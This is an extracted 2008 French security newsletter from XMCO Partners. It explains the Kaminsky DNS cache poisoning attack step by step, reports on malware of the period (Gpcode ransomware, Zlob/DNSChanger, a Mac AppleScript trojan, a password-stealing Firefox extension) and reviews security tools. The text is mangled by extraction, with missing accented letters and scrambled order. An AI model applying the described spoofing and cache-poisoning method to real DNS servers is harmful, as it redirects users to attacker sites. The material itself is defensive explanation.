Pour que cette attaque fonctionne, il faut : 1 - n<N pour que l'attaque fonctionne. 2 - Que le serveur A sache effectuer des requtes rcursives, c'est--dire demander un autre serveur la rponse. 3 - Que le serveur pirate usurpe l'identit du serveur B lors de l'envoi de la fausse rponse. Le protocole DNS est bas sur le protocole UDP. UDP est un protocole non able, car "non connect". Le protocole UDP peut alors tre "spoof", c'est--dire que n'importe qui sur Internet peut envoyer des paquets UDP en usurpant l'adresse IP source d'un autre serveur ; et donc dans le cas prsent d'un serveur DNS. Dans notre exemple, le serveur Pirate envoie une fausse rponse forge en se faisant passer pour le serveur DNS B. La seule scurit propose par le protocole DNS an de garantir l!intgrit d!une rponse DNS repose sur l!identiant (ID) envoy avec la question initiale. Ainsi, pour accepter la rponse de B ou du serveur Pirate, le serveur A envoi un numro ID alatoire avec sa question et attend cet ID dans la rponse. La faille est trs prcisment ici. L'algorithme utilis pour gnrer les identiants des requtes DNS utilise un espace de recherche trop restreint. De plus, les ports sources UDP utiliss sont simplement incrments sur la majorit des systmes voire xs la valeur "53". Un pirate est donc en mesure de prdire l'identiant et d'envoyer des rponses DNS falsies. Cette vulnrabilit peut tre exploite an de mener une attaque nomme 'DNS Cache Poisonning'. Ce type d'attaque permet au pirate de rpondre avant le vritable serveur DNS de la victime, an de rediriger le trac rseau vers le serveur de son choix. An d'optimiser les temps de rponse, les serveurs DNS enregistrent 'en cache' les rponses. L'attaque persistera donc dans le temps au travers du cache du serveur.
Scnario d'attaque avec Google
1 - L!internaute demande au serveur DNS de son Fournisseur d ! Accs Internet l ! adresse IP de www.google.fr. 2 - Le serveur du FAI ne connait pas la rponse et dcide de faire une requte rcursive au serveur DNS ayant autorit (soit le DNS de Google). 3 - Le pirate envoie massivement des fausses rponses au serveur du FAI en se faisant passer pour le DNS de Google. Le pirate devine l!ID utilis par le DNS du FAI (c!est la faille). 4 - Le serveur du FAI accepte la fausse rponse du pirate, l!enregistre dans son cache et rpond l!internaute en lui indiquant la fausse adresse IP. L!internaute est alors dirig vers un faux site Google. Le faux site pourra alors lui proposer de tlcharger des virus, des bots, des malwares, l!envoyer vers d!autres faux sites de commerce en ligne, etc.
Ractions des diteurs" : randomision de l!ID et du port source Les diteurs ont t avertis avant l!alerte. Cela leur a permis de prparer et de corriger les serveurs DNS. Tous les serveurs DNS publics congurs pour accepter "les requtes rcursives" taient (certains le sont certainement encore) vulnrables. Tous les serveurs DNS (Sun, Linux, AIX, Cisco, Juniper...) bass sur le logiciel BIND (named), version 8 et 9 (CVE-2008-1447) Enn, les serveurs DNS Microsoft Windows (MS08-037/CVE-2008-1454), certainement les plus implments sont galement vulnrables.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![32]
LACTU SCU N20
Les diteurs, dont Microsoft, augmentent l'entropie, c'est--dire l'aspect alatoire, du choix de l'ID DNS. Les diteurs modient galement l'entropie dans le choix du port source UDP, qui jusqu'alors tait nulle, an de rduire les chances de russites d'une telle attaque. Ainsi, la rception d!une rponse d!un autre DNS, le serveur resolver vriera que l!ID est bien le mme et que le port source UDP a t respect. Bien sr, nous attendons d!assister la BlackHat le 4 aot pour avoir les dtails de cette attaque et comprendre comment Dan Kaminsky " Deputy Dan" a dcouvert un moyen efcace d!exploiter la vieille faille des DNS et comprendre pourquoi les diteurs ont eu si peur. Rfrences : [ 1 ] h t t p : / / w w w. i s c . o r g / i n d e x . p l ? / s w / b i n d / b i n d security.php [2] http://www.microsoft.com/france/technet/security/ bulletin/ms08-037.mspx
serveur DNS d'autorit qui ne peut rsoudre compltement la requte (nom inexistant) et la seconde du pirate assurant la rsolution complte de la requte demande. Dans le cas o deux rponses lgitimes sont reues par un serveur DNS, le protocole prvoit d'utiliser la rponse la plus complte; dans notre exemple, la rponse spoofe par le pirate. Le protocole prvoit dans ce cas d!accorder une grande conance au serveur dont la rponse et la plus complte" : ici, le pirate. Cette concurrence sur la conance est la base de l!attaque DNS qui a fait la une des mdias dbut juillet. Toutefois, cette attaque n'est pas aussi simple. En effet, pour que la rponse envoye par le pirate soit traite, celle-ci doit contenir le mme identiant DNS (ID) utilis par la requte rcursive envoye au serveur d'autorit (cod sur 16 bits soit 1 chance sur 65536). Le pirate doit donc envoyer de une un maximum de 65536 requtes diffrentes sur le serveur DNS de "fai.com" (10 minutes), avec des demandes pour rsoudre de nombreux noms de domaine INEXISTANTS (inexistant1.xmcopartners.com, inexistant2.xmco.com..., inexistant65536.xmco.com). chaque requte, une rponse forge sera envoye avec un QID incrment.
Ces informations nont pas t confirmes

par Kaminsky et sont donc prendre avec prcaution...
La mthode de Dan Kaminsky ne s'arrte pas l" ! En effet, le pirate peut galement exploiter le champ (ou enregistrement) DNS nomm RR : Resource Records. En insrant un RR additionnel dans la rponse, un pirate pourrait modier le cache de manire changer le serveur d'autorit du domaine vis (dans notre exemple "xmco.com"). Comme la rponse du DNS pirate est considre "de conance" car plus complte, le champs RR additionnel sera pris en compte par le serveur DNS victime. Nous supposons, donc ici pourquoi Microsoft a corrig le serveur DNS et le client DNS (le resolver) dans son patch de scurit de juillet.
Quelle est cette nouvelle mthode dcouverte par Dan Kaminsky"? Suite une fuite d'information (leakage) malheureuse (voir http://www.matasano.com/log/1105/regarding-thepost-on-chargen-earlier-today/), certains dtails de cette mthode d'attaque ont t publis. Ces informations n!ont pas t conrmes par Kaminsky et sont donc prendre avec prcaution. Notre premire analyse de la faille donnait quelques pistes sur la vulnrabilit en question et prsentait l!exploitation connue des failles DNS. Nous vous proposons ici une nouvelle analyse avec les nouveaux dtails publis durant quelques heures Matasano. Toute l'astuce repose sur le fait que l'attaquant demande un enregistrement volontairement inexistant aux serveurs DNS de la victime. Par exemple : L'attaquant demande la rsolution de "inexistant.xmco.com" au serveur DNS du FAI de la victime "ns.fai.com". Pendant que le serveur DNS de "fai.com" ralise une requte rcursive pour rsoudre ce nom qui n'existe pas, l'attaquant s'empresse d'envoyer une rponse spoofe. Le serveur DNS victime va donc recevoir deux rponses : la premire du
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![33]
LACTU SCU N20
Prenons un exemple concret": Rappel sur le fonctionnement DNS":
(ns.fai.com) de la victime. Ce serveur envoie alors des requtes rcursives au serveur DNS d!autorit du domaine "xmco.com" (ns.xmco.com). 2)$ Le serveur DNS "ns.xmco.com " rpond en indiquant que le nom demand est inconnu. La rponse contient uniquement l!adresse du domaine NX (l!adresse de xmco.com) avec l!identiant contenu dans la requte. Le pirate renvoie galement une rponse spoofe avec un champ RR additionnel malicieux pour chaque requte envoye en esprant que le ID utilis soit le mme que celui utilis avec le serveur d!autorit (ns.xmco.com). Seule la rponse forge possdant le bon ID sera traite.
L!attaque de Dan Kaminsky: tape 2 Une fois que le pirate a lanc les nombreuses requtes DNS et les rponses associes, ce dernier trouve l!une des rponses envoyes par le pirate contient le bon ID DNS (ici 2222).
1) $ Un utilisateur demande l!adresse IP de www.xmco.com son serveur DNS (ns.fai.com) 2)$ Le serveur DNS du FAI envoie une requte rcursive au serveur DNS d!autorit (ns.xmco.com) du domaine "xmco.com " . Cette requte possde un ID (identiant de scurit). 3) $ Le serveur d!autorit renvoie l!adresse IP associe www.xmco.com au serveur DNS du FAI dans une rponse DNS contenant le mme ID que la requte. 4) $La rponse est alors renvoye lu ! tilisateur.
L!attaque de Dan Kaminsky: tape 1
1) Le pirate envoie une requte DNS sur le nom de domaine inexistant "inexistant02222.xmco.com " au serveur DNS du FAI (82.82.82.82) 2) Le serveur DNS du FAI renvoie la requte au serveur d!autorit de "xmco.com " (ns.xmco.com) avec le ID=2222. 3) Le pirate envoie une rponse DNS spoofe avec l!ID=2222 et l!adresse IP de "inexistant02222.xmco.com " . Cette rponse inclut galement un champ RR an de mettre jour le cache du serveur DNS du FAI et de modier l!adresse IP du serveur d!autorit de "xmco.com " par l!adresse IP du serveur DNS du pirate.
$ 1) Un pirate envoie de 1 65536 requtes DNS concernant des noms inconnus (inexistantXXXX.xmco.com) au serveur DNS du FAI
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![34]
Le serveur d!autorit a galement envoy une rponse or celle-ci indique que le nom "inexistant02222.xmco.com" est inconnue. Le serveur DNS du FAI va donc recevoir 2 rponses DNS lgitimes. Toutefois, seule la rponse forge par le pirate sera prise en compte, car elle rsout compltement le nom de domaine "inexistant02222.xmco.com". L!instruction RR remplacera galement le serveur DNS du FAI. Ainsi, toutes les requtes DNS (*.xmco.com) de tous les serveur DNS du FAI seront rediriges vers DNS du pirate. cache du nouvelles clients du le serveur
Le pirate matrise dsormais le domaine xmco.com": toutes les rsolutions de noms pour ce domaine seront transmises au DNS pirate. Nous reviendrons en dtails sur cette vulnrabilit ds lors que Dan Kaminsky aura publiquement dvoil les dtails son attaque et la preuve de concept associe...
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![35]
LACTU SCU N20
Des virus, toujours des virus...
Le premier vritable virus pour Mac OS X exploite une vulnrabilit du systme Il est communment admis que les systmes Apple ne sont pas sujets aux virus car ceux-ci sont bass sur un noyau Unix. Les utilisateurs ne sont donc pas Administrateur de leur poste. C!est un fait. Les experts en scurit informatique pouvaient cependant mettre une rserve" : " Oui, tant qu!il n!y a pas d!exploit local permettant au virus de passer Administrateur". " C!est malheureusement une chose temporairement possible avec la dcouverte la faille d!lvation de privilges prsente ci-dessus. En effet, un nouveau virus vient de faire son apparition, quelques heures aprs la dcouverte de la vulnrabilit. Ce dernier baptis AppleScript.THT se matrialise sous la forme d!un AppleScript compil sous le nom ASthtv05 (60KB) permettant au pirate de prendre le contrle total du systme (excution de code, captures d!cran avec le logiciel iSight, enregistrement les frappes clavier, vols des mots de passe de l!utilisateur pig, dsactivation des messages systmes).
GPcode, un ransomeware coriace Un nouveau virus de la famille des 'Ransom ware' a fait son apparition au dbut du mois de Juin. Ce dernier, variante du virus 'Gpcode' s!est peu peu rpandu et a certainement nerv plus d!une victime. En effet, Gpcode est un virus chiffrant les chiers situs sur le poste de travail d'un utilisateur infect. Tout d!abord, le virus recherche sur les disques durs locaux la prsence de chiers aux extensions suivantes .doc, .txt, .pdf, .xls, .jpg, .png, .cpp, .h... Ces derniers sont alors dupliqus. Le premier exemplaire (document original) est supprim tandis que le second exemplaire devient chiffr avec une cl RSA de 1024 bits et devient donc inutilisable... Une fois les chiers chiffrs, le virus afche des messages d'alerte, incitant l'utilisateur contacter le pirate an d'acheter le programme de dchiffrement (virus appel communment 'Ransom ware'), restaurant les chiers dans leur tat original.
INFO...
Et Symbian OS ?
Les plateformes mobiles sont galement victimes de virus. Le dernier en date affecte les plateformes Symbian S60 de troisime gnration et se matrialise sous la forme dune archive Jar (lecteur vido java) 'iSexPlayer.jar'. Cette dernire, destine visualiser des vidos pornographiques, est actuellement rpandue sur Internet. Une fois installe sur le systme, l'application incite l'utilisateur devenir membre. L'utilisateur acceptant l'invitation ne peut plus lannuler. Il doit alors autoriser l'application envoyer un SMS surtax de deux euros. Une fois l'autorisation accorde, le malware effectue l'insu de l'utilisateur, en moyenne 7 appels internationaux par jour.
De plus, le chier texte suivant est alors cr la racine de chaque rpertoire :
Le virus est aujourd ! hui dtect sous le nom 'Virus.Win32.Gpcode.ak'. Son excution est ainsi empche par les antivirus mis jour. La version prcdente de Gpcode utilisait une cl de 660 bits mal implmente et avait t casse par les chercheurs du laboratoire antiviral Kaspersky. Cette fois-ci, la tche devient nettement plus difcile, car
LACTU SCU N20
l!implmentation du chiffrement RSA ne comporte aucun problme. Une solution de contournement a t trouve par les quipes du laboratoire Kasperski et consiste utiliser un logiciel permettant de rcuprer les chiers supprims.
Le virus ZLOB sattaque aux routeurs Le virus Zlob [1] plus connu sur le nom de DNSChanger a galement t mis jour. Ce virus, dvelopp en 2006, permet de modier les congurations des serveurs DNS. Le Domain Name System (DNS) est un systme permettant d'tablir une correspondance entre une adresse IP et un nom de domaine. Le virus tente de contaminer les routeurs en testant un certain nombre de comptes par dfaut (Linksys, Cisco, Netgear, ...) sur les accs telnet, SSH... La liste de ces identiants par dfaut est constitue de 761 combinaisons.
Kaspersky a donc dvelopp un logiciel nomm StopGpcode, bas le projet Open Source PhotoRec de Christophe Grenier de la socit cgsecurity. Rfrences : [1] http://www.cgsecurity.org/wiki/Main_Page [2] http://www.f-secure.com/v-descs/gpcode.shtml
INFO...
Firefox et les extensions caches
Les extensions Firefox se composent d'un fichier .xpi permettant leur installation. Celles-ci permettent d'ajouter de nouvelles fonctionnalits au navigateur (voir Actu-Secu n19). Cependant, ces extensions sont dotes de privilges levs (envoi de requtes AJAX sur d'autres domaines que celui visit, interaction avec les composants du navigateur ...). Les malwares sont friands de ces extensions permettant notamment le vol d'identifiants et de comptes bancaires ...L'extension 'FFsniFF' [3] en est l'exemple. Cette dernire permet, la soumission de chaque formulaire contenant un mot de passe, d'envoyer par mail un pirate, le contenu du formulaire. Une fois installe, cette extension n'apparait pas dans le gestionnaire d'extension. L'utilisateur est alors dup, ne pouvant dsinstaller cette extension.
Une fois install sur l'quipement infect, le virus tente de changer la conguration DNS du routeur. Grce cette manipulation, les pirates peuvent ainsi rediriger leurs victimes sur des sites de leur choix. En effet, lorsqu'un utilisateur demande de visiter le site www.xmcopartners.com par exemple, les serveurs DNS retournent l'IP 91.121.7.172 . En modiant la conguration DNS statique, les pirates peuvent alors spcier d'associer le site xmcopartners vers l'IP de leur serveur pirate. Les premires versions du virus se contentaient de modier le chier 'C:/WINDOWS/system32/drivers/etc/ hosts' sur le poste infect. Ce chier se comporte comme un serveur DNS, il fait la correspondance entre les adresses IP et les noms de domaines.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![37]
LACTU SCU N20
En s'attaquant directement au routeur, le virus peut compromettre tous les utilisateurs du rseau. Des attaques de Phishing peuvent tre menes grce ce procd (redirection vers des faux sites : banques, ebay...) an de voler des comptes, ou des donnes condentielles. An d!viter toute contamination, nous vous conseillons de respecter les quelques rgles de base savoir : Changer le mot de passe par dfaut de votre routeur en utilisant un mot de passe solide (caractres spciaux, nombres, majuscules, minuscules Congurer votre routeur an d!autoriser uniquement certaines adresses IP accder l ! interface d!administration Maintenez jour votre rmware. Dsactiver UPnP ( ;-) Rfrences : http://extremesecurity.blogspot.com/2008/06/usedefault-password-get-hijacked.html
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![38]
LACTU SCU N20
OUTILS LIBRES
Liste des outils bien utiles

Chaque mois, nous vous prsentons, dans cette rubrique, les outils libres qui nous paraissent utiles et pratiques. Ces utilitaires ne sont en aucun cas un gage de scurit et peuvent galement tre un vecteur dattaque. Nous cherchons simplement vous faire part des logiciels gratuits qui pourraient faciliter votre travail ou lutilisation quotidienne de votre ordinateur. Ce mois-ci, nous prsenterons plusieurs logiciels Scurit : coffre-fort lectronique et deux outils pour les administrateurs...
XMCO | Partners
Aprs avoir prsent quelques extensions Firefox (de retour le mois prochain), nous nous sommes intresss aux logiciels de chiffrements (gestionnaire de mots de passe et de partition), capables de stocker des mots de passe ou informations sensibles de manire scurise. Nous prsenterons donc trois logiciels de ce type (Windows et Mac) ainsi que deux logiciels pratiques.
KeePass TrueCrypt AxBan : un tueur d!Active X
Flying Bit Password Keeper
LACTU SCU N20
Flyingbit
Gestionnaire dinformations sensibles
Utilit Type Systme dexploitation Description
Scurit Windows Comme chacun a pu en faire l!exprience, rester secure demande une mmoire d!lphant. Les dizaines de comptes (login rseau, email, serveur, machines personnelles, compte en banque, FTP, SSH...) doivent tre unique pour viter tout vol d!information. Le POST-IT est devenu au ls des annes, le moyen le plus utilis en entreprise pour y crire ses mots de passe mais malheureusement le mois scuris de tous. Des logiciels permettent donc de grer la scurit du stockage de vos informations sensibles. Flyingbit est l!un d!entre eux et remplit parfaitement sa mission. Un seul mot de passe est dsormais ncessaire pour accder l!ensemble de ses mots de passe stocks dans une base de donnes chiffre.
Capture dcran
Tlchargement
Flyingbit est disponible l!adresse suivante : http://www.yingbit.com/downloads/ Flyingbit est un des logiciels du march capable de rpondre aux besoins de stockage d!informations sensibles. Dote d!un interface simple, ce dernier deviendra rapidement votre compagnon prfr.
Avis XMCO
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![40]
LACTU SCU N20
KeePass
Gestionnaire dinformations sensibles
Scurit Windows/Linux/Mac OS X/Blackberry/PalmOS/Symbian... Toujours dans le mme genre, un autre outil nomm KeePass propose exactement les mmes services que l!outil prcdent : classication des informations, gnrateur de mots de passe solides, copie dans le presse papier, sauvegarde chiffre de la base de donnes...
Capture dcran
Tlchargement
Keepass est disponible l!adresse suivante : http://keepass.info/download.html KeePass est galement un des logiciels libres capable de rpondre ce type de besoin. De plus, l!diteur fournit galement une version portable, ne ncessitant aucune installation particulire ainsi que des versions pour quipements mobiles (Symbian OS, PocketPC, PalmOS, Blackberry...De quoi emmener tous vos mot de passe en vacances sans le moindre risque!
Avis XMCO
LACTU SCU N20
TrueCrypt
Logiciel de chiffrement
Scurit Windows/Linux/Mac OS X... TrueCrypt est un logiciel qui permet de chiffrer la vole chaque document sauvegard, de faon transparente pour l!utilisateur. Utilisant des algorithmes forts (AES, Triple DES), cet outil se congure simplement. Il suft de crer un chier appel conteneur qui stockera les chiers chiffrs. Ce conteneur doit tre affect un volume qui ne pourra tre accessible qu!avec un mot de passe entr dans l!interface du logiciel. Ainsi, lorsque ce volume est "dmont " , personne ne pourra accder vos donnes.
Capture dcran
Tlchargement
http://www.truecrypt.org/downloads.php Avis XMCO TrueCrypt est un logiciel pratique. Toutes vos donnes crites sur un volume cr au pralable sont chiffres de manire transparente. Les informations sensibles peuvent donc tre gardes et stockes en toute tranquillit. Attention toute fois de congurer correctement ce logiciel. Une fois le mot de passe saisi pour accder la partition chiffre, celui-ci reste donc accessible par les virus...Prenez donc garde bien fermer la partition ou de manire automatique aprs un certain temps d!inactivit...
TrueCrypt (6.0a) est disponible sur de nombreuses plateformes l!adresse suivante":
AxBan
Gestion des Kill bit
Administration
Dans une autre catgorie, passons maintenant un utilitaire qui ravira les administrateurs systme. En effet, les failles de scurit relatives aux Active X sont lgions, mais les diteurs mettent souvent quelques jours voire quelques semaines avant de corriger les problmes. An d!empcher les excutions de ces contrles dangereux, il est possible d!ajouter une valeur nomme killbit qui bloquera l!Active X en question. Cependant, aucun outil ne permettait jusqu! prsent d!ajouter un kill bit de manire simple. AxBan est un logiciel lger capable de bloquer les Active X de votre choix.
Capture dcran
Tlchargement
Avis XMCO
AxBan est un logiciel pratique. Il vous permet de connatre les Active X installs sur votre machine et de pouvoir les bloquer en un clic de souris.
La dernire version de AxBan est disponible l!adresse suivante : http://portal.erratasec.com/axb/AxBan.exe
LACTU SCU N20

propos de lActuScu L!ActuScu est un magazine numrique rdig et dit par les consultants du cabinet de conseil Xmco Partners. Sa vocation est de fournir des prsentations claires et dtailles sur le thme de la scurit informatique, en toute indpendance. Il s!agit de notre newsletter. Tous les numros de l!ActuScu sont tlchargeables l!adresse suivante: http://www.xmcopartners.com/actualite-securite-vulnerabilite-fr.html propos du cabinet Xmco Partners Fonds en 2002 par des experts en scurit, dirige par ses fondateurs, nous n'intervenons que sous forme de projets forfaitaires avec engagement de rsultats. Les tests d'intrusion, les audits de scurit, la veille en vulnrabilit constituent nos axes majeurs de dveloppement pour notre cabinet. Paralllement, nous intervenons auprs de Directions Gnrales dans le cadre de missions d!accompagnement de RSSI, d!laboration de schma directeur ou encore de sminaires de sensibilisation auprs de plusieurs grands comptes franais. Contacter le cabinet Xmco Partners Pour contacter le cabinet Xmco Partners et obtenir des informations sur notre mtier : 01 47 34 68 61. Notre site web : http://www.xmcopartners.com/
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![44]

XMCO ActuSecu 20 UPNP

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

XMCO ActuSecu 20 UPNP

Uploaded by

Copyright:

Available Formats

LACTUSCU 20

UPNP (PLUG N PLAY) UN PROTOCOLE DANGEREUX ?

LACTU SCU N20

Audit de scurit Audit technique et organisationnel de la scurit de votre Systme d'Information

Pour contacter le cabinet Xmco Partners et dcouvrir nos prestations : http://www.xmcopartners.com/

Hacking with UPnP......................................4

LActualit scurit du mois......................24 CSRF, Flash et UPnP..................................13

LACTU SCU N20

LES DESSOUS DU PROTOCOLE UPNP (PLUGN PLAY)

Hacking with UPnP

Le protocole UPnP, mconnu, mais efcace...

LACTU SCU N20

Le fonctionnement du protocole UPnP

Plusieurs catgories ont t dfinies par

LACTU SCU N20

Rponse d!une requte M-SEARCH

LACTU SCU N20

Fichier de conguration UPnP d!une imprimante

Liste des services proposs par l!quipement UPnP

LACTU SCU N20

Les auteurs du protocole UPnP ont conu

Prsence d!une imprimante UPnP sur le rseau local

Un nouveau service apparat alors dans la liste des services de WIndows.

Service SSDP de Windows

LACTU SCU N20

La preuve par lexemple : natter un port via UPnP

LACTU SCU N20

Utilisation d!un plugin NMAP

2me service": WANCommonInterfaceCong:1

Fichier de conguration Public_UPnP_WAND.xml

Fichier de conguration Public_UPnP_WANIPConn.xml

LACTU SCU N20

Entte de la requte envoye au routeur

Paramtre de la requte POST (sans retour la ligne lors de l!envoi)

LACTU SCU N20

LACTU SCU N20

Les attaques CSRF et UPnP

CSRF, FLASH ET... UPNP

Les attaques CSRF

avoir des effets dvastateurs ...

Le navigateur envoie une requte HTTP sur le site www.site-vulnerable.com,demandant d ! ajouter un

Peu mdiatises, les attaques CSRF peuvent

LACTU SCU N20

LACTU SCU N20

Lien Microsoft : http://msdn.microsoft.com/en-us/library/ cc288060(VS.85).aspx

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

LACTU SCU N20

Le CSRF combin aux faiblesses du protocole UPnP

LACTU SCU N20

Code source de la page HTML malicieuse

L!utilisateur victime, pense visualiser un site habituel.

LACTU SCU N20

LACTU SCU N20

LACTU SCU N20

On regrettera l!absence de dmonstration live...

LACTU SCU N20

LACTU SCU N20

Formulaire d!authentication d!une banque

Formulaire inject par Anserin lors de l!authentication sur la banque en ligne

LACTU SCU N20

Rsultat d!un scan avec SinFP

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

LACTU SCU N20